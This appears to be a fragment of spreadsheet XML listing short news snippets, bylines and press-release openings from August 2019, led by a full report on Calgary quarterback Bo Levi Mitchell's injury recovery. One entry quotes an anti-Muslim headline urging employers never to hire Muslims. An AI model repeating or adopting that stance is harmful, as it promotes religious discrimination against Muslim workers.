    <t>Calgary Stampeders quarterback Bo Levi Mitchell took another step towards returning to the football field with zip on his passes in Friday's practice. The CFL's Most Outstanding Player and Grey Cup MVP in 2018 hasn't played since suffering a tear in the pectoral muscle of his throwing arm in a June 29 game. But head coach Dave Dickenson wasn't ready to declare Mitchell his starting quarterback for Monday's annual Labour Day game against the Edmonton Eskimos. "I think he made strides again, so that was positive," Dickenson said. Mitchell had targeted the Aug. 17 home game against Montreal has his return date. The quarterback wasn't ready, however, and returned to the six-game injured list. Backup Nick Arbuckle is 4-3 in starts in Mitchell's absence. Mitchell was activated again this week and split reps with Arbuckle on Thursday. He threw the football with authority Friday and made some long completions. "The ball's coming out really well," Mitchell said. "Honestly I feel a thousand times better than yesterday. It's just building that capacity, throwing a lot." Calgary (5-4) is fourth in the CFL's West Division behind the Eskimos (6-4). Dickenson said he and Stampeders general manager John Hufnagel discussed the quarterbacking situation Friday, but have yet to make a decision. "We're just not there yet," Dickenson said. "It is nice to see (Mitchell) improving and making those throws you're used to seeing him make." Mitchell, 29, reached a career 25,000 passing yards in the June 29 game before he was sidelined late in the fourth quarter. The two-time CFL MOP owns a pair of Grey Cup rings (2014, 2018). Arbuckle, 25, has a completion rate of 73.4 per cent with 11 touchdown throws in eight games. Donna Spencer, The Canadian Press</t>
  </si>
  <si>
    <t>SANTA CLARA, Calif., Aug. 22, 2019 /PRNewswire-PRWeb/ -- Momentus (http://www.momentus.space), provider of in-space shuttle services that...</t>
  </si>
  <si>
    <t>Saudi Aramco sent a request for proposal to several banks, people familiar with the matter told CNBC Monday.</t>
  </si>
  <si>
    <t>Back by popular demand, Turner Classic Movies (TCM) will once again sail the high seas in 2020. After selling out the 2019 cruise in record...</t>
  </si>
  <si>
    <t>Ocean News</t>
  </si>
  <si>
    <t>Kraken Robotik GmbH , has been awarded a contract to deliver 3,000-meter rated SeaVision® laser scanning sensors to the GEOMAR Helmholtz...</t>
  </si>
  <si>
    <t>Aug, Sat 3 2019 - 7:00 PM to 10:00 PM</t>
  </si>
  <si>
    <t>Staff estimate Dunn took more than 11 million calls in his career</t>
  </si>
  <si>
    <t>By Michael Hollan</t>
  </si>
  <si>
    <t>While General Mills has released promotional “just marshmallow” boxes of the iconic cereal in the past, the company recently announced that...</t>
  </si>
  <si>
    <t>5 years after scrapping controversial FYUP, UGC panel recommends 4-yr UG courses</t>
  </si>
  <si>
    <t>Israel Prime Minister Benjamin Netanyahu wished Prime Minister Narendra Modi a ‘Happy International Friendship Day’ on Sunday.</t>
  </si>
  <si>
    <t>Ultratravel Collection, the luxury arm of Global Hotel Alliance (“GHA”), today announced FAUCHON Hospitality has signed a membership...</t>
  </si>
  <si>
    <t>LAS VEGAS, Aug. 30, 2019 /PRNewswire-PRWeb/ -- Dahryn Trivedi, today released research results from scientific research on the beneficial...</t>
  </si>
  <si>
    <t>The global market size of remote patient monitoring system value is expected to reach 1,727.30 million by 2026 and estimated to grow at a...</t>
  </si>
  <si>
    <t>RESTON, Va., Aug. 7, 2019 /PRNewswire/ -- Comscore, a trusted partner for planning, transacting and evaluating media across platforms,...</t>
  </si>
  <si>
    <t>"The objectives of this study are to define, segment, and project the size of the Smart Luggage Market based on company, product type, end...</t>
  </si>
  <si>
    <t>Aug. 22-- SAN JOSE, Calif.-For as long as humans have practiced science, men have dominated research. Much of our understanding of the...</t>
  </si>
  <si>
    <t>Global "Coffee Whitener Market" research provides a fundamental overview of the industry such as definitions, classifications, applications...</t>
  </si>
  <si>
    <t>By AFP 2 mins ago in World</t>
  </si>
  <si>
    <t>Three masked youngsters from Hong Kong's anti-government movement took the unusual step on Tuesday of holding a press conference to demand...</t>
  </si>
  <si>
    <t>Julie DelahayeOnline Travel Writer</t>
  </si>
  <si>
    <t>British Airways is facing worldwide IT failures and has been forced to cancel a number of flights - here are the ones cancelled</t>
  </si>
  <si>
    <t>LOS ANGELES (AP) — Nneka Ogwumike had 17 points, seven rebounds and five steals as the Los Angeles Sparks beat the Indiana Fever 98-65 on...</t>
  </si>
  <si>
    <t>Lauren Wagner Aguirre</t>
  </si>
  <si>
    <t>LEMOORE — Law enforcement and local neighbors have the chance to come together on Tuesday to celebrate Lemoore’s annual National Night...</t>
  </si>
  <si>
    <t>Relying on smartphone apps for health related issues is almost a matter of course these days, from step trackers to weight loss programs,...</t>
  </si>
  <si>
    <t>Silicon Valley-based RevUp Software, the leading predictive data analytics platform for fundraising in politics, launched their nonprofit...</t>
  </si>
  <si>
    <t>TEMPE, Ariz., Aug. 26, 2019 (GLOBE NEWSWIRE) -- Tempe, Ariz. (August 26, 2019) – Today, the Intercollegiate Tennis Association (ITA) is...</t>
  </si>
  <si>
    <t>Italy's 5-Star Movement and the opposition Democratic Party (PD) said on Wednesday they would try to form a coalition, setting aside years...</t>
  </si>
  <si>
    <t>Toronto-based EnergyX Solutions Inc., expanding rapidly in North America, has partnered with Southern California Public Power Authority...</t>
  </si>
  <si>
    <t>Originally posted on https://www.effectiveagents.com/what-home-renovations-give-you-the-best-roi/ Let’s face it. You want the most bang...</t>
  </si>
  <si>
    <t>By Gregory E. Miller</t>
  </si>
  <si>
    <t>Emma Nelson, the newcomer at the center of Richard Linklater’s latest film “Where’d You Go, Bernadette” didn’t have the ideal introduction...</t>
  </si>
  <si>
    <t>By:                                       Natay Holmes</t>
  </si>
  <si>
    <t>San Diego (KGTV) One plate at a time, a San Diego couple is hoping to help those living on the streets with no food to eat. They’re using...</t>
  </si>
  <si>
    <t>[email protected]</t>
  </si>
  <si>
    <t>Trusted Business Insights presents the Latest Study on Brazil Polyethylene Terephthalate (PET) Market 2019-2025. The report contains market...</t>
  </si>
  <si>
    <t>By Herald Scotland Online</t>
  </si>
  <si>
    <t>Rugby 0 comment JIM MALLINDER will join the Scottish Rugby Union as its new performance director. The 53-year-old had been working with...</t>
  </si>
  <si>
    <t>Hyderabad: Amazon launched its largest campus in the international in Hyderabad on Wednesday which become inaugurated through Home Minister...</t>
  </si>
  <si>
    <t>The Global Electroceutical Devices Market, by Product Type (Cardiac Pacemakers, Implantable Cardioverter Defibrillators, Cardiac...</t>
  </si>
  <si>
    <t>Eva Vigh</t>
  </si>
  <si>
    <t>Vintage Cycle—a sales, rental and repair bicycle store—opened June 1 at 20326 Hwy. 249, Ste. 300, Houston. The shop sells various bicycles...</t>
  </si>
  <si>
    <t>A nine-year-old girl who was rejected by one of Germany’s most renowned boys choir is suing the choir for gender bias. An administrative...</t>
  </si>
  <si>
    <t>"Tristan Lavalette" /</t>
  </si>
  <si>
    <t>Not even a historic opportunity to defeat mighty USA will distract the Boomers from their focus of being primed for the upcoming basketball...</t>
  </si>
  <si>
    <t>In the 1980s Meg Gatt found herself fighting to save a place she had never visited. News crews had beamed vignettes of Tasmania's...</t>
  </si>
  <si>
    <t>CHICAGO, Aug. 23, 2019 /PRNewswire/ -- According to the new market research report "Enteral Feeding Devices Market by Type (Feeding Pump,...</t>
  </si>
  <si>
    <t>BOULDER, CO / ACCESSWIRE / August 15, 2019 / 7thirty led a $2.1MM financing round for Flourish Software. Flourish Software provides...</t>
  </si>
  <si>
    <t>TORONTO, Aug. 29, 2019 (GLOBE NEWSWIRE) -- CLC President Hassan Yussuff will be in Toronto to take part in the Toronto &amp; York Region...</t>
  </si>
  <si>
    <t>It is fair to say that when Atlético Madrid announced the signing of Kieran Trippier in July the deal was met with little fanfare. In...</t>
  </si>
  <si>
    <t>PALO ALTO, Calif. and CALABASAS, Calif., Aug. 7, 2019 /PRNewswire/ -- Altamont Capital Partners (Altamont) and Topa Insurance Group (Topa)...</t>
  </si>
  <si>
    <t>Carlos Vela scored his league-leading 24th goal on a penalty kick in the 64th minute and visiting Los Angeles Football Club became the...</t>
  </si>
  <si>
    <t>The United States often takes a leading role in calling out the world's most dangerous places, warning its people about the risks of...</t>
  </si>
  <si>
    <t>CANCUN, Mexico (AP) -- Reynaldo Rodriguez hit a two-run home run and had two hits, and Wilfredo Boscan allowed just three hits over eight...</t>
  </si>
  <si>
    <t>August 30, 2019 - Northwest League (NWL) - Spokane Indians News Release SPOKANE, Wash. - The Spokane Indians are proud to announce that...</t>
  </si>
  <si>
    <t>DEVOPS WORLD | JENKINS WORLD--CloudBees®, the enterprise DevOps leader powering the continuous economy, today announced release 9.1 of...</t>
  </si>
  <si>
    <t>James Quigley</t>
  </si>
  <si>
    <t>Keel Point LLC trimmed its holdings in shares of Intel Co. (NASDAQ:INTC) by 6.4% in the 2nd quarter, according to the company in its most...</t>
  </si>
  <si>
    <t>John Ridlehoover</t>
  </si>
  <si>
    <t>Taika Waititi, the writer and director of 2017's Thor: Ragnarok, will be working on another project before he returns to Marvel Studios to...</t>
  </si>
  <si>
    <t>The Schall Law Firm, a national shareholder rights litigation firm, announces the filing of a class action lawsuit against Granite...</t>
  </si>
  <si>
    <t>By Steve Keating LIMA (Reuters) - Having gained the upper hand in his battle with cancer, Nathan Adrian was at the Pan Am Games on Tuesday...</t>
  </si>
  <si>
    <t>By TIM AYLEN Associated Press</t>
  </si>
  <si>
    <t>McLEAN'S TOWN CAY, Bahamas (AP) — Hurricane Dorian shut down some hotels in the northern Bahamas and forced some evacuations Saturday as...</t>
  </si>
  <si>
    <t>NEW YORK --(BUSINESS WIRE) Regulatory News: International Flavors &amp; Fragrances Inc. (NYSE: IFF) (Euronext Paris: IFF) (TASE: IFF)...</t>
  </si>
  <si>
    <t>philstar</t>
  </si>
  <si>
    <t>Sino Ang May Sala? finale reveals real culprit Ver Paulino (The Philippine Star) – August 8, 2019 – 12:00am MANILA, Philippines — Deception...</t>
  </si>
  <si>
    <t>A defined analysis of the existing state of the “Nut Meals Market” is done on this market research report. The document consists of...</t>
  </si>
  <si>
    <t>by (ANA) African News Agency</t>
  </si>
  <si>
    <t>Three Totalsports Women’s Races took place on National Women's Day 9 August with Jenet Mbhele, Glenrose Xaba and Annie Bothma picking up...</t>
  </si>
  <si>
    <t>Dublin, Aug. 28, 2019 (GLOBE NEWSWIRE) -- The "The Fixed Services in Developed Asia-Pacific: Trends and Forecasts 2019 - 2024"...</t>
  </si>
  <si>
    <t>The Saratoga Hospital 37th Annual Gala held on Wednesday, July 31, raised a record-breaking $501,310 in net proceeds, shattering the...</t>
  </si>
  <si>
    <t>MONROE, Mich., Aug. 12, 2019 (GLOBE NEWSWIRE) -- La-Z-Boy Incorporated (NYSE: LZB) will report its fiscal 2020 first-quarter results...</t>
  </si>
  <si>
    <t>ANI | Updated: Aug 21, 2019 17:31 IST Singapore, Aug 21 (ANI): Banks in Asia's trade-dependent developed markets will face the most...</t>
  </si>
  <si>
    <t>MISSOULA, Mont. (AP) -- Jose Curpa hit a walk-off single in the 10th inning, as the Missoula Osprey defeated the Billings Mustangs 3-2 on...</t>
  </si>
  <si>
    <t>Checking in on some recent market action, we have noted that shares of Gartner, Inc. (NYSE:IT) have been seen trading around the $127 mark....</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 28, 2019 (GLOBE NEWSWIRE) -- Pawar Law Group announces that a class action lawsuit has been filed on behalf of...</t>
  </si>
  <si>
    <t>WASHINGTON, Aug. 6, 2019 /PRNewswire/ -- Washington D.C. is an educational and fun experience your whole family can enjoy. With the...</t>
  </si>
  <si>
    <t>TORONTO, Aug. 1, 2019 /CNW/ - From bestselling authors to the most anticipated new releases, Indigo stores across Canada are thrilled to...</t>
  </si>
  <si>
    <t>PALO ALTO, Calif., Aug. 27, 2019 /PRNewswire/ -- , a global leader in integration, API management, and analytics, today announced a new...</t>
  </si>
  <si>
    <t>By Hideyuki Sano</t>
  </si>
  <si>
    <t>By Hideyuki Sano TOKYO (Reuters) - Global bond yields flirted with record lows while stocks struggled to recover on Thursday, as global...</t>
  </si>
  <si>
    <t>Global Soybean Oil Market to Reach 56.6 Million Tons by 2024, Bolstered by Increasing Health Consciousness Among Consumers - IMARCGroup.com...</t>
  </si>
  <si>
    <t>Data storage firm Seagate revealed that it has moved its anti-fraud blockchain project with IBM into the pilot stage. Launched in 2018,...</t>
  </si>
  <si>
    <t>BOSTON, Aug. 13, 2019 (GLOBE NEWSWIRE) -- As companies grapple with the realities of digital transformation, top luminaries agree that...</t>
  </si>
  <si>
    <t>Postmedia News                        More from Postmedia News</t>
  </si>
  <si>
    <t>The good news is federal Crime Reduction Minister Bill Blair announced this week that Ottawa is promising $54 million over three years to...</t>
  </si>
  <si>
    <t>A student has battled debilitating chronic fatigue syndrome and fibromyalgia to secure nine of the highest GCSE grades. Alicia Daley, 16,...</t>
  </si>
  <si>
    <t>Susan Schwartz, Montreal Gazette</t>
  </si>
  <si>
    <t>Bamboo toothbrushes and eyeglass frames made of recycled materials might not save the environment in and of themselves, but they can show...</t>
  </si>
  <si>
    <t>A married father-of-two who filmed a cardboard model of Grenfell Tower being burned on a bonfire has been cleared by a judge who branded...</t>
  </si>
  <si>
    <t>SMYRNA, Tenn. — A 13-year-old Yorkie named Titus has been reunited with his Tennessee family after reportedly being dognapped just over a...</t>
  </si>
  <si>
    <t>Originally posted on https://getfoosball.com/gift-foosball-enthusiast-friend/ There’s nothing quite like the game of foosball, combining...</t>
  </si>
  <si>
    <t>San Jose, California and Fremont, California, Aug. 20, 2019 (GLOBE NEWSWIRE) -- via NEWMEDIAWIRE – Sonasoft Corp. (OTCQB: SSFT), a leader...</t>
  </si>
  <si>
    <t>A Minnesota prosecutor charged singer R. Kelly on Monday with prostitution and solicitation related to an allegation that he invited a...</t>
  </si>
  <si>
    <t>Written by ACT of CT</t>
  </si>
  <si>
    <t>ACT of Connecticut Announces “Out of This World” Cast for LITTLE SHOP OF HORRORS ACT (A Contemporary Theatre) of Connecticut is excited to...</t>
  </si>
  <si>
    <t>Jarrell Ellis (born March 28, 1991), better known by his stage name J.E Da Weirdo, is a veteran turned American rapper, songwriter, and...</t>
  </si>
  <si>
    <t>robowombat</t>
  </si>
  <si>
    <t>NEVER HIRE A MUSLIM: A Muslim sympathizer gives you several reasons why AUGUST 7, 2019 BY BARENAKEDISLAM If for some misguided...</t>
  </si>
  <si>
    <t>More than fifty agencies throughout North Wales have been given a cuisine hygiene rating of 1. This low ranking ability that "important...</t>
  </si>
  <si>
    <t>by Lauren McMah and Vanessa Brown</t>
  </si>
  <si>
    <t>AN Australian man who died after he fell overboard on a Royal Caribbean cruise ship has been identified as Sydney entrepreneur Jonathan...</t>
  </si>
  <si>
    <t>Washington was 12 games under .500 near the end of May, but have turned things around and find themselves in a pennant race.</t>
  </si>
  <si>
    <t>SPRINGFIELD, Mo., Aug. 1, 2019 /PRNewswire/ -- Andy's Frozen Custard® (www.eatandys.com), the beloved frozen dessert business providing the...</t>
  </si>
  <si>
    <t>TEAM NEWS Liverpool goalkeeper Alisson remains on the sidelines with a calf injury so Adrian will continue to deputise. Naby Keita and...</t>
  </si>
  <si>
    <t>Caruth Haven Court, the upscale senior living community situated in the heart of Dallas’ Park Cities area, has named Laura Allegro new...</t>
  </si>
  <si>
    <t>By Cam Tyeson</t>
  </si>
  <si>
    <t>After a lengthy injury layoff, Rudd looks to have lost little - if any - form.</t>
  </si>
  <si>
    <t>PETALUMA, Calif., Aug. 14, 2019 /PRNewswire/ -- One Legal today announced the appointment of a new Executive, adding to its growing...</t>
  </si>
  <si>
    <t>MOGADISHU, Somalia (AP) — Somali military officers say at least four soldiers and a photographer embedded with the army were killed in an...</t>
  </si>
  <si>
    <t>by EMILY FABER, Sinclair Broadcast Group</t>
  </si>
  <si>
    <t>NEW YORK CITY (SBG) - When I injured my lower back earlier this year, I found the most relief not through heating patches or Advil but...</t>
  </si>
  <si>
    <t>Kristine Spure, Writer, journalist, content marketer at TrueSix</t>
  </si>
  <si>
    <t>Remember – a happy team makes a happy manager.</t>
  </si>
  <si>
    <t>"Global Injection Molded Plastic Market 2019-2026 file working together carries in-intensity Analysis at the distinctive international...</t>
  </si>
  <si>
    <t>BRITAIN Robert Shrimsley</t>
  </si>
  <si>
    <t>S ometimes it is the cleverest wheezes that come back to haunt you. Boris Johnson's daring move to suspend the UK parliament, to limit the...</t>
  </si>
  <si>
    <t>by Buhle Lindwa</t>
  </si>
  <si>
    <t>The Krugersdorp Killers appeared in court for pre-sentencing rulings on Monday after being convicted of 32 counts of charges in June.</t>
  </si>
  <si>
    <t>WTVQ Admin</t>
  </si>
  <si>
    <t>There is a certain mindless pleasure in the “Fallen” movies. Watching Gerard Butler muscle his way through increasingly preposterous...</t>
  </si>
  <si>
    <t>Fiz Brown returns to Weatherfield – and a school hostage situation, courtesy of Evelyn</t>
  </si>
  <si>
    <t>Sexual assault suspects arrested after May 16 incident Two men were arrested Monday afternoon in connection with the sexual assault of a...</t>
  </si>
  <si>
    <t>New Delhi: Rape-accused Uttar Pradesh MLA Kuldeep Singh Sengar and his accomplice, Shashi Singh were produced before a Delhi court on...</t>
  </si>
  <si>
    <t>The UK public purse delivered a smaller-than-expected surplus last month as public spending continued to increase. The Government posted a...</t>
  </si>
  <si>
    <t>SUN GAZETTE NEWSPAPERS</t>
  </si>
  <si>
    <t>The former general superior of the Servants of the Immaculate Heart of Mary (IHM) order of Roman Catholic nuns has been appointed interim...</t>
  </si>
  <si>
    <t>SOURCE: Edison International By Julia Roether Clear views of Catalina Island and the San Gabriel Mountains every day are a thing of the...</t>
  </si>
  <si>
    <t>BARRY WILNER AP Pro Football Writer</t>
  </si>
  <si>
    <t>The NFL would love the main focus of 2019 to be on the celebrations of its 100th season. Sorry. While the history of the league is a...</t>
  </si>
  <si>
    <t>Reynolds went 1-for-4 with a solo home run in a 4-3 loss against the Brewers on Tuesday. Although it dropped his average, Reynolds had...</t>
  </si>
  <si>
    <t>Jack Boland  More from Jack Boland</t>
  </si>
  <si>
    <t>Bandages, blisters, flailing arms and cramping legs — welcome to Miss Universe Canada dance rehearsals. Over 50 delegates from across...</t>
  </si>
  <si>
    <t>Patrick Everett Tadeo</t>
  </si>
  <si>
    <t>In May 2019, the Department of Transportation (DOTr) announced that it has created a new set of guidelines for what it calls as Premium...</t>
  </si>
  <si>
    <t>By Mary Pflum</t>
  </si>
  <si>
    <t>The dilemma over what to do with embryos cast aside, and who should assume ownership of them, is a thorny one.</t>
  </si>
  <si>
    <t>We are very excited to be supporting the Bulletproof Agency Network event, ‘How To Scale Your Agency (Without Selling Your Soul)’ in...</t>
  </si>
  <si>
    <t>Dan Mihalascu</t>
  </si>
  <si>
    <t>British brand MG continues to leverage the resources of parent company SAIC by launching its first-ever pickup truck. After rebadging the...</t>
  </si>
  <si>
    <t>Mesut Ozil become not covered in Arsenal's squad for the Premier League visit of Burnley as David Luiz turned into handed his debut....</t>
  </si>
  <si>
    <t>Real Estate News, Patch Staff</t>
  </si>
  <si>
    <t>Check out a few of the homes now on the market near you. 7052 N Lake Dr Brentwood, Tennessee 37027 1001 Crimson Clover Dr Brentwood,...</t>
  </si>
  <si>
    <t>Oh, it’s onnnn! The team takes on Axel (aka. David Dobrik) in a dance-off to get to the super weapon on Eagle Island. #AngryBirdsMovie2 in...</t>
  </si>
  <si>
    <t>Ian Ferris</t>
  </si>
  <si>
    <t>Leganes and KFC have renewed their sponsorship agreement for a further two years, reports, www.sportspromedia.com/. As part of the deal,...</t>
  </si>
  <si>
    <t>By Williamson Source</t>
  </si>
  <si>
    <t>From WCS inFocus The Page High theater department is inviting all fairy tale fans to a Princess Tea Party Saturday, September 7. From 1...</t>
  </si>
  <si>
    <t>HONG KONG -- A total of 15 police officers were injured and sent to the hospital for treatment during escalated violence incidents by...</t>
  </si>
  <si>
    <t>August 22, 2019, 7am PDT | Camille Fink</t>
  </si>
  <si>
    <t>Lower speed limits make cities safer, more livable, and, in the long run, more functional.</t>
  </si>
  <si>
    <t>The "Metal and Ceramic Injection Molding - Market Analysis, Trends, and Forecasts" report has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>Nizaar Kinsella</t>
  </si>
  <si>
    <t>Having named the youngest Chelsea team since February 1994 for his side's clash with Norwich City, Frank Lampard can be forgiven for the...</t>
  </si>
  <si>
    <t>TaaS (CURRENCY:TAAS) traded down 3.9% against the dollar during the twenty-four hour period ending at 9:00 AM E.T. on August 22nd. TaaS has...</t>
  </si>
  <si>
    <t>The report is a comprehensive exploration of Global Wearable Technology market offering growth rates, size of the industry, competitive...</t>
  </si>
  <si>
    <t>OLDWICK, N.J. --(BUSINESS WIRE) AM Best has assigned a Long-Term Issue Credit Rating (Long-Term IR) of “bbb+” to the newly issued $25...</t>
  </si>
  <si>
    <t>Zacks Investment Research lowered shares of Weibo (NASDAQ:WB) from a hold rating to a sell rating in a research report sent to investors on...</t>
  </si>
  <si>
    <t>Keith Dempsey For The Sudbury Star</t>
  </si>
  <si>
    <t>With new coach on board, improvements to Noeville Arena, Rapids prepare for training camp</t>
  </si>
  <si>
    <t>The New York mayor told mourners that a firefighter who died of a heart attack after a 24-hour shift kept responding to emergency calls...</t>
  </si>
  <si>
    <t>The Church of England has attacked Wayne Rooney over his multi-million pound deal with a gambling firm. The Derby County signing will have...</t>
  </si>
  <si>
    <t>Busy shoppers have left around £228 million worth of uncollected products at click-and-collect sites over the past year, blaming the hassle...</t>
  </si>
  <si>
    <t>A defined analysis of the existing state of the “Floating Power Plant Market” is done on this market research report. The document consists...</t>
  </si>
  <si>
    <t>By Gary</t>
  </si>
  <si>
    <t>Former WWE Universal Champion Roman Reigns recently spoke to Sport1 in Germany. During the interview, he gave his take on why All Elite...</t>
  </si>
  <si>
    <t>Elaine Low, provided by</t>
  </si>
  <si>
    <t>Some sighs of relief are emerging internally, now that the long-anticipated Viacom-CBS merger has been formalized, but a number of...</t>
  </si>
  <si>
    <t>FORT LAUDERDALE, Fla., Aug. 16, 2019 /PRNewswire/ -- On Friday, August 9, 2019, The Miami Marlins honored the Center for Independent Living...</t>
  </si>
  <si>
    <t>A month ago St. Augustine Beach successfully enacted laws banning single-use polystyrene products. It was to take effect in January, but...</t>
  </si>
  <si>
    <t>Orlando Bloom found it "hard" to be away from his son whilst filming 'Carnival Row', as he filmed for six months in the Czech Republic.</t>
  </si>
  <si>
    <t>Originally posted on http://www.dontcrampmystyle.co.uk/2019/08/smart-ways-to-dress-up-your-windows.html Since the dawn of time, windows...</t>
  </si>
  <si>
    <t>Cyntoia Brown, an inmate recently released on clemency after being given a life sentence at the age of 16, has married recording artist J....</t>
  </si>
  <si>
    <t>Aug 03, 2019 (MarketResearchNest via COMTEX News Network) -- MarketResearchNest.com adds "Global FPGA Market Insights, Forecast to 2025"...</t>
  </si>
  <si>
    <t>Andreea Papuc</t>
  </si>
  <si>
    <t>(Bloomberg) -- The global bond rally is not over, according to Pendal Group’s Vimal Gor, who is betting on short-term Treasuries to...</t>
  </si>
  <si>
    <t>MELBOURNE, Australia (AP) — Kemba Walker scored 23 points and Myles Turner added 15 to give Team USA a 102-86 win over Australia on...</t>
  </si>
  <si>
    <t>10 Views ATLANTA–(BUSINESS WIRE)–Americold Realty Trust (NYSE: COLD) (the “Company”), the world’s largest publicly traded REIT focused on...</t>
  </si>
  <si>
    <t>Russian President Vladimir Putin insisted Wednesday that a recent deadly explosion at a military testing site in northwestern Russia hasn't...</t>
  </si>
  <si>
    <t>SUNRISE, Fla., Aug. 22, 2019 (GLOBE NEWSWIRE) -- Beta Music Group Inc. (OTC PINK: BEMG), through its operating subsidiary Get Credit...</t>
  </si>
  <si>
    <t>Global “Road Speed Limiter (RSL) Market”2019 Research report provides information regarding market size, share, trends, growth, cost...</t>
  </si>
  <si>
    <t>Power producer PG&amp;E Corp said on Friday it is evaluating a proposal from hedge funds Knighthead Capital Management and Abrams Capital...</t>
  </si>
  <si>
    <t>Anthony Albanese is jetting off to Jakarta for his first overseas trip as federal leader of the Australian Labor Party. Trade will be atop...</t>
  </si>
  <si>
    <t>The Bridge Initiative: Women+ in Theatre (TBI) announces its next production, ROAR! A Celebration, to be presented at Tempe Center for the...</t>
  </si>
  <si>
    <t>The waiting, rock star Tom Petty once sang, is the hardest part. But that’s what anxious investors will have to do. Wait for President...</t>
  </si>
  <si>
    <t>The "World Antiemetics Market - Opportunities and Forecasts, 2017 - 2023" report has been added to ResearchAndMarkets.com's offering....</t>
  </si>
  <si>
    <t>The law firm of Lieff Cabraser Heimann &amp; Bernstein, LLP reminds investors of the upcoming deadline to move for appointment as lead...</t>
  </si>
  <si>
    <t>JOCELYN GECKER Associated Press</t>
  </si>
  <si>
    <t>(AP) - For decades, Placido Domingo, one of the most celebrated and powerful men in opera, has tried to pressure women into sexual...</t>
  </si>
  <si>
    <t>Beachgoers watch shark devour seal just yards off shore...</t>
  </si>
  <si>
    <t>First Trust Specialty Finance and Financial Opportunities Fund (the "Fund") (NYSE: FGB) has declared the Fund's regularly scheduled...</t>
  </si>
  <si>
    <t>GET IN TOUCH Manuela Maier Agnitas AG +49 89 5529 08-0 https://www.agnitas.de/ You can see the original version and more on PRLeap here:...</t>
  </si>
  <si>
    <t>Tasers will be issued to every frontline officer in one police force in response to a “sickening trend” of attacks on the emergency...</t>
  </si>
  <si>
    <t>Premier (NASDAQ:PINC) released its quarterly earnings results on Tuesday, August 20th. The company reported $0.57 earnings per share (EPS)...</t>
  </si>
  <si>
    <t>DUBLIN --(BUSINESS WIRE) The "India Polytetrafluoroethylene (PTFE) Comprehensive Techno-Commercial Market Study, 2013-2030" report has been...</t>
  </si>
  <si>
    <t>/EIN News/ -- Dublin, Aug. 29, 2019 (GLOBE NEWSWIRE) -- The "Aerospace and Defense Telemetry - Market Analysis, Trends, and Forecasts"...</t>
  </si>
  <si>
    <t>Spoilers forward for She-Ra &amp; The Princesses of Power Season 3. Adora's historical past with the Princesses and the Horde just bought much...</t>
  </si>
  <si>
    <t>The Gelfling rebellion doesn’t play into the original Dark Crystal movie as simply as you might think</t>
  </si>
  <si>
    <t>Arsenal defender Nacho Monreal has joined La Liga side Real Sociedad on a two-year deal. The Spain international, 33, has started all three...</t>
  </si>
  <si>
    <t>The Nine at Memphis. Image courtesy of TSB Realty NB Private Capital has acquired The Nine @ Memphis, a 114-unit student housing community...</t>
  </si>
  <si>
    <t>Carinsuranceplan.org announces a new blog post, "The Fastest Ways to Get Car Insurance Quotes"</t>
  </si>
  <si>
    <t>While the scores in East Tennessee went up again. The progress is rather slow.</t>
  </si>
  <si>
    <t>JessieAnne Gartlan</t>
  </si>
  <si>
    <t>SEVERAL locals have been recognised at the Country Racing Victoria annual awards night on Saturday. Great Western's Carl Barry was...</t>
  </si>
  <si>
    <t>CHICAGO--(BUSINESS WIRE)--Aug 29, 2019-- Accel Entertainment, Inc. (“Accel” or the “Company”), a leading gaming-as-a-service provider,...</t>
  </si>
  <si>
    <t>Nina Golgowski</t>
  </si>
  <si>
    <t>A toxic algae blamed for the deaths of multiple dogs across the U.S. this summer has been detected in three New York City parks, prompting...</t>
  </si>
  <si>
    <t>WASHINGTON, Aug. 8, 2019 /PRNewswire/ -- Today, 214 bipartisan mayors from across the country sent a letter to Senate Majority Leader Mitch...</t>
  </si>
  <si>
    <t>By  Gina Marinelli</t>
  </si>
  <si>
    <t>In the fashion industry lip service doesn’t really go a long way. Brands and designers can promise to do better and say they care, but it’s...</t>
  </si>
  <si>
    <t>NEW YORK, NY, Aug. 21, 2019 (GLOBE NEWSWIRE) -- via NEWMEDIAWIRE -- PeerStream, Inc. (“PeerStream,” the “Company,” “we,” “our” or “us”)...</t>
  </si>
  <si>
    <t>Jennifer A. Dlouhy</t>
  </si>
  <si>
    <t>(Bloomberg) -- President Donald Trump’s plan to freeze U.S. vehicle efficiency standards would hike costs for motorists without doing...</t>
  </si>
  <si>
    <t>Cecilia Stephenson and Kendrick Porter were found safe on Friday</t>
  </si>
  <si>
    <t>0 comment Liverpool goalkeeper Adrian is hopeful of featuring against Southampton despite bizarrely injuring his ankle after an accidental...</t>
  </si>
  <si>
    <t>Ulrich Thienel MD, PhD, has been appointed by the ReAlta Life Sciences Board of Directors as Chief Executive Officer, effective September...</t>
  </si>
  <si>
    <t>The Jeffrey Epstein case establishes beyond a doubt that if you’re a sexual predator, it pays to be a rich and connected sexual predator....</t>
  </si>
  <si>
    <t>Versum Materials (NYSE:VSM) was downgraded by Zacks Investment Research from a “hold” rating to a “sell” rating in a research note issued...</t>
  </si>
  <si>
    <t>John Newby</t>
  </si>
  <si>
    <t>With both the BMW Championship and THE NORTHERN TRUST complete, the time has come for the 2019 Tour Championship. The top 30 golfers in the...</t>
  </si>
  <si>
    <t>PARIS (AP) — Catholic pilgrims have held an emotional procession past fire-ravaged Notre Dame Cathedral, singing and parading with a statue...</t>
  </si>
  <si>
    <t>BILOXI, Miss. (AP) — Hurricanes Camille and Katrina were as different as night and day, yet those who lived through both storms say the two...</t>
  </si>
  <si>
    <t>Petaling Jaya: Missing Irish teenager Nora Ann Quirin has been to Asia and many European countries before, but she never went astray or...</t>
  </si>
  <si>
    <t>Joe Mario Pedersen Orlando Sentinel (TNS)</t>
  </si>
  <si>
    <t>ORLANDO, Fla. — A tropical wave in the west Atlantic gained strength and has a 70% chance of becoming a tropical depression over the next...</t>
  </si>
  <si>
    <t>Kamala Khan, a Pak­istani-Amer­i­can teen, and the first Mus­lim super­hero to head­line her own Mar­vel com­ic book. Gift­ed with the Kree...</t>
  </si>
  <si>
    <t>REPORTING FOR 2019-08-26 | TODAYISRAEL.COM: With the assistance of the Beat The Market Analyzer software and our own in-house methods, we...</t>
  </si>
  <si>
    <t>Aug, Sat 17 2019 - 11:00 AM to 9:00 PM</t>
  </si>
  <si>
    <t>0 comment Calls have been made to tackle the rough sleeping crisis after campaigners claimed one homeless person is dying on average every...</t>
  </si>
  <si>
    <t>By</t>
  </si>
  <si>
    <t>LINCOLN, Neb. (AP) - A former Nebraska Medicaid audit administrator who bilked the program and his father out of nearly $300,000 has been...</t>
  </si>
  <si>
